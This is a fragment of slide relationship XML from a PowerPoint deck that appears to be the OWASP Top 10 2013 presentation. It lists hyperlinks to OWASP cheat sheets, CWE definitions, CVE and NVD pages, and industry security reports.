Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SSL-TLS" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html"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www.owasp.org/index.php/Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forced_browsing"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www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRF" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI"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www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/home.cfm" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Good_Component_Practices_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mojo.codehaus.org/versions-maven-plugin/"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cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse"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www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Education_Presentation" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project"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www.owasp.org/index.php/Code_Review_Guide" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://h3xstream.github.com/find-sec-bugs/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://findbugs.sourceforge.net/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/zaproxy/wiki/HelpStartConceptsAscan" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_O2_Platform" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Live_CD_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ZAP" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Orizon_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Code_Crawler" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebScarab"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hyperlink" Target="https://www.owasp.org/index.php/Portuguese" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Brazilian" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Portuguese_Language_Project" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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19.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.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notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2010" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007"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cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2011/09/ExpressionLanguageInjection.pdf" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/799.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Privacy_Violation" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/915.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Denial_of_Service" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Insufficient+Anti-automation" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010)" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Mass_assignment_vulnerability" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Information-Leakage" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A3"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owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:owasp-topten@lists.owasp.org"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hyperlink" Target="https://www.owasp.org/index.php/Industry:Citations" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference"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owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softtek.com/webdocs/special_pdfs/WP-State-of-the-art-2013.pdf" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.veracode.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2013/06/Aspect-2013-Global-AppSec-Risk-Report.pdf" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.softtek.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.mindedsecurity.com/2013/02/real-life-vulnerabilities-statistics.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www2.trustwave.com/rs/trustwave/images/2013-Global-Security-Report.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasptop10.googlecode.com/files/WPstats_winter11_11th.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitehatsec.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/spiderlabs/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/collateral/whitepaper/HP2012CyberRiskReport_0313.pdf" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://info.veracode.com/rs/veracode/images/VERACODE-SOSS-V4.PDF"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10"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hyperlink" Target="https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId15" 